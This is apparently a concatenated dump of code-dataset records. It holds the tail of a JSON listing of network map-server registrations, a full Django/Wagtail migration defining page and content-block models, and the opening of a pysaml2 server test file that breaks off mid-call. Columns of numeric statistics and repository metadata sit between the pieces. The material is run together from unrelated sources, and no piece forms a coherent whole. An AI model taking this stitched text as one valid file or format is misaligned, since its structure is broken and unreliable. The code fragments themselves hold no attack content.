"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8192,
},
"0c75.bdff.ac41/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.ac5e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"0c75.bdff.ac84/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"0c75.bdff.ac86/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0c75.bdff.ac88/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0c75.bdff.ac90/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.ac94/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.b765/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"0c75.bdff.b76c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"0c75.bdff.be13/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.be16/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.be1a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.bffa/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8192,
},
"0c75.bdff.bffb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0c75.bdff.bffc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"0c75.bdff.bffd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"7426.acff.f7cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8192,
},
"7426.acff.0282/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"a89d.21ff.23dc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"a89d.21ff.2818/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8192,
},
"a89d.21ff.35f6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8192,
},
"a89d.21ff.36fd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"a89d.21ff.3e8a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8192,
},
"a89d.21ff.3e8c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8192,
},
"a89d.21ff.3e8f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8192,
},
"a89d.21ff.3e90/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8192,
},
"a89d.21ff.40b8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8192,
},
"a89d.21ff.40f1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"a89d.21ff.40f3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"a89d.21ff.515e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"a89d.21ff.54de/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8192,
},
"a89d.21ff.54e1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8192,
},
}
},
},
}
}
| 43.776238
| 68
| 0.303118
| 62,971
| 817,959
| 3.739785
| 0.059043
| 0.15832
| 0.224286
| 0.158065
| 0.926445
| 0.898292
| 0.898292
| 0.898292
| 0.89819
| 0.896534
| 0
| 0.247392
| 0.559016
| 817,959
| 18,684
| 69
| 43.778581
| 0.405487
| 0
| 0
| 0.647078
| 0
| 0
| 0.319214
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
07cd5eaa7c2a511153e418ebc6b75b8566522da9
| 134,411
|
py
|
Python
|
code/pages/migrations/0001_initial.py
|
eea/eea.docker.flis
|
9bc78d9bf3436e9539f15a6a0ba9c2fd7a030907
|
[
"BSD-3-Clause"
] | null | null | null |
code/pages/migrations/0001_initial.py
|
eea/eea.docker.flis
|
9bc78d9bf3436e9539f15a6a0ba9c2fd7a030907
|
[
"BSD-3-Clause"
] | null | null | null |
code/pages/migrations/0001_initial.py
|
eea/eea.docker.flis
|
9bc78d9bf3436e9539f15a6a0ba9c2fd7a030907
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-28 10:33
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import multiselectfield.db.fields
import pages.abstract_models
import pages.snippets
import wagtail.wagtailcore.blocks
import wagtail.wagtailcore.fields
import wagtail.wagtailimages.blocks
import wagtail.wagtailsnippets.blocks
class Migration(migrations.Migration):
initial = True
dependencies = [
('wagtailimages', '0018_remove_rendition_filter'),
('wagtailcore', '0032_add_bulk_delete_page_permission'),
]
operations = [
migrations.CreateModel(
name='Institution',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('logo', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
to='wagtailimages.Image')),
],
),
migrations.CreateModel(
name='StaticIndex',
fields=[
('page_ptr',
models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True,
primary_key=True, serialize=False, to='wagtailcore.Page')),
('header_color', models.CharField(blank=True,
choices=[('aqua', 'Aqua'), ('black', 'Black'), ('cherry', 'Cherry'),
('lime', 'Lime'), ('purple', 'Purple'), ('orange', 'Orange'),
('red', 'Red')], max_length=255, null=True)),
('header_icon', models.CharField(blank=True, choices=[('book', 'Book'), ('chart', 'Chart'),
('clusters', 'Clusters'), ('counter', 'Counter'),
('cutlery', 'Cutlery'), ('database', 'Database'),
('drop', 'Drop'), ('eye', 'Eye'),
('glasses', 'Glasses'),
('indicator', 'Indicator'),
('lighting', 'Lightning'), ('diamond', 'Note'),
('puzzle', 'Puzzle'),
('road-signs', 'Road Signs'), ('stack', 'Stack'),
('strategy', 'Strategy'), ('sunset', 'Sunset'),
('target', 'Target'), ('upload', 'Upload'),
('users-leader', 'Users')], max_length=255,
null=True)),
('allowed_subpage_types', multiselectfield.db.fields.MultiSelectField(blank=True, choices=[
('flis_horison_scanning.Trend', 'flis_horison_scanning.Trend'),
('flis_horison_scanning.Uncertainty', 'flis_horison_scanning.Uncertainty'),
('flis_horison_scanning.WeakSignal', 'flis_horison_scanning.WeakSignal'),
('flis_horison_scanning.WildCard', 'flis_horison_scanning.WildCard'),
('flis_flip.Assesment', 'flis_flip.Assesment'),
('flis_flip.ForwardLookingActivity', 'flis_flip.ForwardLookingActivity')], max_length=178,
null=True)),
('page_template', models.CharField(blank=True, choices=[
('pages/drivers_of_change.html', 'pages/drivers_of_change.html'),
('pages/assesments_of_uses_index.html', 'pages/assesments_of_uses_index.html'),
('pages/foresight_in_policy_cycle_index.html', 'pages/foresight_in_policy_cycle_index.html')],
max_length=255, null=True)),
('header_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL,
related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=(pages.abstract_models.TemplateableMixin, 'wagtailcore.page'),
),
migrations.CreateModel(
name='StaticPage',
fields=[
('page_ptr',
models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True,
primary_key=True, serialize=False, to='wagtailcore.Page')),
('header_color', models.CharField(blank=True,
choices=[('aqua', 'Aqua'), ('black', 'Black'), ('cherry', 'Cherry'),
('lime', 'Lime'), ('purple', 'Purple'), ('orange', 'Orange'),
('red', 'Red')], max_length=255, null=True)),
('header_icon', models.CharField(blank=True, choices=[('book', 'Book'), ('chart', 'Chart'),
('clusters', 'Clusters'), ('counter', 'Counter'),
('cutlery', 'Cutlery'), ('database', 'Database'),
('drop', 'Drop'), ('eye', 'Eye'),
('glasses', 'Glasses'),
('indicator', 'Indicator'),
('lighting', 'Lightning'), ('diamond', 'Note'),
('puzzle', 'Puzzle'),
('road-signs', 'Road Signs'), ('stack', 'Stack'),
('strategy', 'Strategy'), ('sunset', 'Sunset'),
('target', 'Target'), ('upload', 'Upload'),
('users-leader', 'Users')], max_length=255,
null=True)),
('subtitle', models.CharField(blank=True, max_length=255, null=True)),
('content', wagtail.wagtailcore.fields.StreamField((('three_columns',
wagtail.wagtailcore.blocks.StructBlock(((
'block_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'first_column_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'first_column_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'first_column_color',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'aqua',
'Aqua'),
(
'black',
'Black'),
(
'cherry',
'Cherry'),
(
'lime',
'Lime'),
(
'purple',
'Purple'),
(
'orange',
'Orange'),
(
'red',
'Red')])),
(
'first_column_icon',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'book',
'Book'),
(
'chart',
'Chart'),
(
'clusters',
'Clusters'),
(
'counter',
'Counter'),
(
'cutlery',
'Cutlery'),
(
'database',
'Database'),
(
'drop',
'Drop'),
(
'eye',
'Eye'),
(
'glasses',
'Glasses'),
(
'indicator',
'Indicator'),
(
'lighting',
'Lightning'),
(
'diamond',
'Note'),
(
'puzzle',
'Puzzle'),
(
'road-signs',
'Road Signs'),
(
'stack',
'Stack'),
(
'strategy',
'Strategy'),
(
'sunset',
'Sunset'),
(
'target',
'Target'),
(
'upload',
'Upload'),
(
'users-leader',
'Users')])),
(
'second_column_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'second_column_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'second_column_color',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'aqua',
'Aqua'),
(
'black',
'Black'),
(
'cherry',
'Cherry'),
(
'lime',
'Lime'),
(
'purple',
'Purple'),
(
'orange',
'Orange'),
(
'red',
'Red')])),
(
'second_column_icon',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'book',
'Book'),
(
'chart',
'Chart'),
(
'clusters',
'Clusters'),
(
'counter',
'Counter'),
(
'cutlery',
'Cutlery'),
(
'database',
'Database'),
(
'drop',
'Drop'),
(
'eye',
'Eye'),
(
'glasses',
'Glasses'),
(
'indicator',
'Indicator'),
(
'lighting',
'Lightning'),
(
'diamond',
'Note'),
(
'puzzle',
'Puzzle'),
(
'road-signs',
'Road Signs'),
(
'stack',
'Stack'),
(
'strategy',
'Strategy'),
(
'sunset',
'Sunset'),
(
'target',
'Target'),
(
'upload',
'Upload'),
(
'users-leader',
'Users')])),
(
'third_column_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'third_column_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'third_column_color',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'aqua',
'Aqua'),
(
'black',
'Black'),
(
'cherry',
'Cherry'),
(
'lime',
'Lime'),
(
'purple',
'Purple'),
(
'orange',
'Orange'),
(
'red',
'Red')])),
(
'third_column_icon',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'book',
'Book'),
(
'chart',
'Chart'),
(
'clusters',
'Clusters'),
(
'counter',
'Counter'),
(
'cutlery',
'Cutlery'),
(
'database',
'Database'),
(
'drop',
'Drop'),
(
'eye',
'Eye'),
(
'glasses',
'Glasses'),
(
'indicator',
'Indicator'),
(
'lighting',
'Lightning'),
(
'diamond',
'Note'),
(
'puzzle',
'Puzzle'),
(
'road-signs',
'Road Signs'),
(
'stack',
'Stack'),
(
'strategy',
'Strategy'),
(
'sunset',
'Sunset'),
(
'target',
'Target'),
(
'upload',
'Upload'),
(
'users-leader',
'Users')]))))),
('four_columns_with_image',
wagtail.wagtailcore.blocks.StructBlock(((
'block_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
('image',
wagtail.wagtailimages.blocks.ImageChooserBlock(
required=True)),
(
'first_column_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'first_column_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'second_column_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'second_column_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'third_column_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'third_column_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'fourth_column_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'fourth_column_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'read_more_button',
wagtail.wagtailcore.blocks.StructBlock(
((
'label',
wagtail.wagtailcore.blocks.CharBlock(
default='Find out more',
required=False)),
(
'page',
wagtail.wagtailcore.blocks.PageChooserBlock(
required=False))),
required=False))))),
('heading_with_text',
wagtail.wagtailcore.blocks.StructBlock(((
'block_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
('style',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'white',
'White background'),
(
'community',
'Community background')])),
('items',
wagtail.wagtailcore.blocks.ListBlock(
wagtail.wagtailcore.blocks.StructBlock(
((
'heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True))))))))),
('heading_with_image',
wagtail.wagtailcore.blocks.StructBlock(((
'block_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
('image',
wagtail.wagtailimages.blocks.ImageChooserBlock(
required=True)),
(
'read_more_button',
wagtail.wagtailcore.blocks.StructBlock(
((
'label',
wagtail.wagtailcore.blocks.CharBlock(
default='Find out more',
required=False)),
(
'page',
wagtail.wagtailcore.blocks.PageChooserBlock(
required=False))),
required=False))))),
('community_stats',
wagtail.wagtailcore.blocks.StructBlock(((
'block_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'first_column_number',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'first_column_text',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'second_column_number',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'second_column_text',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'third_column_number',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'third_column_text',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'fourth_column_number',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'fourth_column_text',
wagtail.wagtailcore.blocks.CharBlock(
required=True))))),
('team', wagtail.wagtailcore.blocks.StructBlock(((
'first_team_member',
wagtail.wagtailsnippets.blocks.SnippetChooserBlock(
required=True,
target_model=pages.snippets.TeamMember)),
(
'second_team_member',
wagtail.wagtailsnippets.blocks.SnippetChooserBlock(
required=True,
target_model=pages.snippets.TeamMember)),
(
'third_team_member',
wagtail.wagtailsnippets.blocks.SnippetChooserBlock(
required=True,
target_model=pages.snippets.TeamMember)),
(
'fourth_team_member',
wagtail.wagtailsnippets.blocks.SnippetChooserBlock(
required=True,
target_model=pages.snippets.TeamMember))))),
('institutions',
wagtail.wagtailcore.blocks.StructBlock(((
'block_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
('items',
wagtail.wagtailcore.blocks.ListBlock(
wagtail.wagtailsnippets.blocks.SnippetChooserBlock(
required=True,
target_model=pages.snippets.Institution)))))),
('polygon_header',
wagtail.wagtailcore.blocks.StructBlock(((
'first_polygon_header',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'first_polygon_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'first_polygon_icon',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'book',
'Book'),
(
'chart',
'Chart'),
(
'clusters',
'Clusters'),
(
'counter',
'Counter'),
(
'cutlery',
'Cutlery'),
(
'database',
'Database'),
(
'drop',
'Drop'),
(
'eye',
'Eye'),
(
'glasses',
'Glasses'),
(
'indicator',
'Indicator'),
(
'lighting',
'Lightning'),
(
'diamond',
'Note'),
(
'puzzle',
'Puzzle'),
(
'road-signs',
'Road Signs'),
(
'stack',
'Stack'),
(
'strategy',
'Strategy'),
(
'sunset',
'Sunset'),
(
'target',
'Target'),
(
'upload',
'Upload'),
(
'users-leader',
'Users')])),
(
'second_polygon_header',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'second_polygon_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'second_polygon_icon',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'book',
'Book'),
(
'chart',
'Chart'),
(
'clusters',
'Clusters'),
(
'counter',
'Counter'),
(
'cutlery',
'Cutlery'),
(
'database',
'Database'),
(
'drop',
'Drop'),
(
'eye',
'Eye'),
(
'glasses',
'Glasses'),
(
'indicator',
'Indicator'),
(
'lighting',
'Lightning'),
(
'diamond',
'Note'),
(
'puzzle',
'Puzzle'),
(
'road-signs',
'Road Signs'),
(
'stack',
'Stack'),
(
'strategy',
'Strategy'),
(
'sunset',
'Sunset'),
(
'target',
'Target'),
(
'upload',
'Upload'),
(
'users-leader',
'Users')])),
(
'third_polygon_header',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'third_polygon_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'third_polygon_icon',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'book',
'Book'),
(
'chart',
'Chart'),
(
'clusters',
'Clusters'),
(
'counter',
'Counter'),
(
'cutlery',
'Cutlery'),
(
'database',
'Database'),
(
'drop',
'Drop'),
(
'eye',
'Eye'),
(
'glasses',
'Glasses'),
(
'indicator',
'Indicator'),
(
'lighting',
'Lightning'),
(
'diamond',
'Note'),
(
'puzzle',
'Puzzle'),
(
'road-signs',
'Road Signs'),
(
'stack',
'Stack'),
(
'strategy',
'Strategy'),
(
'sunset',
'Sunset'),
(
'target',
'Target'),
(
'upload',
'Upload'),
(
'users-leader',
'Users')])),
(
'fourth_polygon_header',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'fourth_polygon_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'fourth_polygon_icon',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'book',
'Book'),
(
'chart',
'Chart'),
(
'clusters',
'Clusters'),
(
'counter',
'Counter'),
(
'cutlery',
'Cutlery'),
(
'database',
'Database'),
(
'drop',
'Drop'),
(
'eye',
'Eye'),
(
'glasses',
'Glasses'),
(
'indicator',
'Indicator'),
(
'lighting',
'Lightning'),
(
'diamond',
'Note'),
(
'puzzle',
'Puzzle'),
(
'road-signs',
'Road Signs'),
(
'stack',
'Stack'),
(
'strategy',
'Strategy'),
(
'sunset',
'Sunset'),
(
'target',
'Target'),
(
'upload',
'Upload'),
(
'users-leader',
'Users')])),
(
'fifth_polygon_header',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'fifth_polygon_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'fifth_polygon_icon',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'book',
'Book'),
(
'chart',
'Chart'),
(
'clusters',
'Clusters'),
(
'counter',
'Counter'),
(
'cutlery',
'Cutlery'),
(
'database',
'Database'),
(
'drop',
'Drop'),
(
'eye',
'Eye'),
(
'glasses',
'Glasses'),
(
'indicator',
'Indicator'),
(
'lighting',
'Lightning'),
(
'diamond',
'Note'),
(
'puzzle',
'Puzzle'),
(
'road-signs',
'Road Signs'),
(
'stack',
'Stack'),
(
'strategy',
'Strategy'),
(
'sunset',
'Sunset'),
(
'target',
'Target'),
(
'upload',
'Upload'),
(
'users-leader',
'Users')])),
(
'sixth_polygon_header',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'sixth_polygon_text',
wagtail.wagtailcore.blocks.RichTextBlock(
required=True)),
(
'sixth_polygon_icon',
wagtail.wagtailcore.blocks.ChoiceBlock(
choices=[
(
'book',
'Book'),
(
'chart',
'Chart'),
(
'clusters',
'Clusters'),
(
'counter',
'Counter'),
(
'cutlery',
'Cutlery'),
(
'database',
'Database'),
(
'drop',
'Drop'),
(
'eye',
'Eye'),
(
'glasses',
'Glasses'),
(
'indicator',
'Indicator'),
(
'lighting',
'Lightning'),
(
'diamond',
'Note'),
(
'puzzle',
'Puzzle'),
(
'road-signs',
'Road Signs'),
(
'stack',
'Stack'),
(
'strategy',
'Strategy'),
(
'sunset',
'Sunset'),
(
'target',
'Target'),
(
'upload',
'Upload'),
(
'users-leader',
'Users')]))))),
('topic_grid',
wagtail.wagtailcore.blocks.StructBlock(((
'block_heading',
wagtail.wagtailcore.blocks.CharBlock(
required=True)),
(
'larger_images',
wagtail.wagtailcore.blocks.BooleanBlock(
default=False,
required=False)),
('items',
wagtail.wagtailcore.blocks.ListBlock(
wagtail.wagtailcore.blocks.PageChooserBlock(
target_model='topics.TopicIndexPage'))),
(
'read_more_button',
wagtail.wagtailcore.blocks.StructBlock(
((
'label',
wagtail.wagtailcore.blocks.CharBlock(
default='Find out more',
required=False)),
(
'page',
wagtail.wagtailcore.blocks.PageChooserBlock(
required=False))),
required=False))))),
('testimonials',
wagtail.wagtailcore.blocks.StructBlock(((
'first_testimonial',
wagtail.wagtailsnippets.blocks.SnippetChooserBlock(
required=True,
target_model=pages.snippets.Testimonial)),
(
'second_testimonial',
wagtail.wagtailsnippets.blocks.SnippetChooserBlock(
required=True,
target_model=pages.snippets.Testimonial)),
(
'third_testimonial',
wagtail.wagtailsnippets.blocks.SnippetChooserBlock(
required=True,
target_model=pages.snippets.Testimonial))))),
('drivers_of_change',
wagtail.wagtailcore.blocks.StructBlock(((
'all_drivers_page',
wagtail.wagtailcore.blocks.StructBlock(
((
'label',
wagtail.wagtailcore.blocks.CharBlock(
default='Find out more',
required=False)),
(
'page',
wagtail.wagtailcore.blocks.PageChooserBlock(
required=False))),
required=True)),))),
('foresight_in_policy_cycle',
wagtail.wagtailcore.blocks.StructBlock(((
'read_more_link',
wagtail.wagtailcore.blocks.StructBlock(
((
'label',
wagtail.wagtailcore.blocks.CharBlock(
default='Find out more',
required=False)),
(
'page',
wagtail.wagtailcore.blocks.PageChooserBlock(
required=False))),
required=True)),))),
('assesments_of_uses',
wagtail.wagtailcore.blocks.StructBlock(((
'read_more_link',
wagtail.wagtailcore.blocks.StructBlock(
((
'label',
wagtail.wagtailcore.blocks.CharBlock(
default='Find out more',
required=False)),
(
'page',
wagtail.wagtailcore.blocks.PageChooserBlock(
required=False))),
required=True)),)))),
blank=True)),
('page_template', models.CharField(blank=True,
choices=[('pages/home_page.html', 'pages/home_page.html'), (
'pages/foresight_dictionary.html',
'pages/foresight_dictionary.html')], max_length=255, null=True)),
('header_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL,
related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=(pages.abstract_models.TemplateableMixin, 'wagtailcore.page'),
),
migrations.CreateModel(
name='TeamMember',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('country', models.CharField(max_length=255)),
('organisation', models.CharField(max_length=255)),
('image', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
to='wagtailimages.Image')),
],
),
migrations.CreateModel(
name='Testimonial',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('author', models.CharField(max_length=255)),
('text', wagtail.wagtailcore.fields.RichTextField()),
('image', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
to='wagtailimages.Image')),
],
),
migrations.CreateModel(
name='Word',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('word', models.CharField(max_length=255)),
('description', wagtail.wagtailcore.fields.RichTextField()),
('live', models.BooleanField(default=True, verbose_name='Is published')),
],
options={
'verbose_name': 'Dictionary word',
'verbose_name_plural': 'Dictionary words',
},
),
]
| 118.947788
| 168
| 0.10026
| 2,024
| 134,411
| 6.523221
| 0.105731
| 0.133606
| 0.17087
| 0.08748
| 0.886238
| 0.851322
| 0.84549
| 0.821859
| 0.739377
| 0.725668
| 0
| 0.003793
| 0.868567
| 134,411
| 1,129
| 169
| 119.053144
| 0.743575
| 0.000506
| 0
| 0.655971
| 1
| 0
| 0.04575
| 0.006245
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008913
| 0
| 0.012478
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
07ef4b91ac1e56c2175c1d474bb4ea1d9a0c9da2
| 91,040
|
py
|
Python
|
tests/test_50_server.py
|
brunato/pysaml2
|
a9a4fe9601cac56917e38197c177772084dc5ce0
|
[
"Apache-2.0"
] | 249
|
2018-03-01T09:47:04.000Z
|
2022-03-26T04:51:26.000Z
|
tests/test_50_server.py
|
brunato/pysaml2
|
a9a4fe9601cac56917e38197c177772084dc5ce0
|
[
"Apache-2.0"
] | 416
|
2018-02-21T15:18:35.000Z
|
2022-03-04T16:59:36.000Z
|
tests/test_50_server.py
|
brunato/pysaml2
|
a9a4fe9601cac56917e38197c177772084dc5ce0
|
[
"Apache-2.0"
] | 203
|
2018-02-21T13:53:12.000Z
|
2022-03-08T22:22:17.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64
import copy
import os
from contextlib import closing
from six.moves.urllib.parse import parse_qs
import uuid
import re
from saml2.cert import OpenSSLWrapper
from saml2.sigver import make_temp, DecryptError, EncryptError, CertificateError
from saml2.assertion import Policy
from saml2.authn_context import INTERNETPROTOCOLPASSWORD
from saml2.saml import NameID, NAMEID_FORMAT_TRANSIENT
from saml2.samlp import response_from_string
from saml2.server import Server
from saml2 import samlp
from saml2 import saml
from saml2 import client
from saml2 import config
from saml2 import extension_elements_to_elements
from saml2 import s_utils
from saml2 import sigver
from saml2 import time_util
from saml2 import VERSION
from saml2.s_utils import OtherError
from saml2.s_utils import do_attribute_statement
from saml2.s_utils import factory
from saml2.s_utils import sid
from saml2.soap import make_soap_enveloped_saml_thingy
from saml2 import BINDING_HTTP_POST
from saml2 import BINDING_HTTP_REDIRECT
from saml2.time_util import instant
from pytest import raises
from pathutils import full_path
import saml2.xmldsig as ds
nid = NameID(name_qualifier="foo", format=NAMEID_FORMAT_TRANSIENT,
text="123456")
AUTHN = {
"class_ref": INTERNETPROTOCOLPASSWORD,
"authn_auth": "http://www.example.com/login"
}
def response_factory(**kwargs):
response = samlp.Response(id=sid(), version=VERSION, issue_instant=instant())
for key, val in kwargs.items():
setattr(response, key, val)
return response
def _eq(l1, l2):
return set(l1) == set(l2)
BASEDIR = os.path.abspath(os.path.dirname(__file__))
def get_ava(assertion):
ava = {}
for statement in assertion.attribute_statement:
for attr in statement.attribute:
value = []
for tmp_val in attr.attribute_value:
value.append(tmp_val.text)
key = attr.friendly_name
if key is None or len(key) == 0:
key = attr.text
ava[key] = value
return ava
def generate_cert():
sn = uuid.uuid4().urn
cert_info = {
"cn": "localhost",
"country_code": "se",
"state": "ac",
"city": "Umea",
"organization": "ITS",
"organization_unit": "DIRG"
}
osw = OpenSSLWrapper()
ca_cert_str = osw.read_str_from_file(
full_path("root_cert/localhost.ca.crt"))
ca_key_str = osw.read_str_from_file(
full_path("root_cert/localhost.ca.key"))
req_cert_str, req_key_str = osw.create_certificate(cert_info, request=True,
sn=sn, key_length=2048)
cert_str = osw.create_cert_signed_certificate(ca_cert_str, ca_key_str,
